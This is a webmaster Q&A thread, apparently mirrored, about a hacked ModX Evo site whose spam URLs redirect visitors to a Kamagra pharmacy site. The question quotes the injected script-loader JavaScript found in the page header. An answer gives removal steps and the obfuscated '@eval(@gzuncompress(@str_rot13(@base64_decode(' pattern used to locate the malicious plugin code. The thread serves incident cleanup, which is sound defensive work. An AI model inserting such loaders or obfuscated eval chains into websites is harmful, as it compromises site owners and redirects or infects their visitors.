Mobile app version of vmapp.org
Login or Join
Murray432

: Site hacked: redirecting to other site? I have a site that appears and works fine. However if you search for it in Google a whole lot of other links come up, eg: mysite.com/kamagra-viagra.html

@Murray432

Posted in: #Hacking #Redirects

I have a site that appears and works fine.

However if you search for it in Google a whole lot of other links come up, eg:

mysite.com/kamagra-viagra.html

Clicking this I get redirected to the Kamagra site.

I have scanned my site for viruses and cant find anything.

I am using the ModX Evo CMS.

Can anyone suggest a particular file I should be looking for that causing this?

EDIT:

I have noticed some strange Javascript in my header:

<script type="text/javascript" src="http://www.mysite.com/home.html?getjs=metric.js"></script>
<script type="text/javascript">var j1s = document.createElement('script');j1s.type = 'text/javascript';j1s.src = 'http://www.mysite.com/home.html?getjs=metric.js?getjs=metric.js';var h1ead = document.getElementsByTagName('head')[0];h1ead.appendChild(j1s);</script>


This is not in my template file, but appears when the page is loaded. I suspect this is the issue.

10.02% popularity Vote Up Vote Down


Login to follow query

More posts by @Murray432

2 Comments

Sorted by latest first Latest Oldest Best

 

@Sent6035632

This is a hack that seems to have compromised several MODx Evo out of date installations. I've just fixed one, this is what needed doing:


In the MODx Manager, go to Elements > Manage Elements > Plugins > "Quick ManagerManager".
Search for the code @eval (@gzuncompress(@str_rot13(@base64_decode( (I found it near the bottom of the file)


This is the encoded malicious code, which causes the metric.js script to be inserted into the top of your home page

Remove this very large line and click save.
Now go to Plugins > "Highlight Search". This whole plugin seems to have been inserted by the attack.


This causes the urls like /best-website-kamagra on your website to redirect to another site. I found it by searching the database for str_rot13.

Delete this plugin.
Go to Elements > Manage Files > assets directory, and delete the 'cache' directory.
Upload a clean assets/cache directory from the MODx Evo distribution.

10% popularity Vote Up Vote Down


 

@Gretchen104

There are tons of possibilities. Your .htaccess file may be compromised and a redirect statement is being evaluated to send users away but that's a fairly blunt hack and easily found and fixed.

More likely is one or more of your CMS core files has had obfuscated code injected and that code runs on each access to both produce spam links for Googlebot consumption and also injects a JavaScript to send users away. The trick here is figuring out which file has been altered and how the attackers gained access and that process can be very difficult for non-security trained people to do.

Also a possibility is that the database containing the site content has been compromised and malicious codes injected there. This can be fatal to a site if you don't have proper safe backups of your content.

In any event, there are two basic questions that arise from a careful reading of the above scenarios:


How did they get in?
What did they change?


With the obvious follow-up being "How do I fix it?"

Unless you have a lot of experience diagnosing and fixing security problems, you may want to leave this to a professional. There are consultants who will do this as well as subscription-based services such as Stop The Hacker or Sucuri.

10% popularity Vote Up Vote Down


Back to top | Use Dark Theme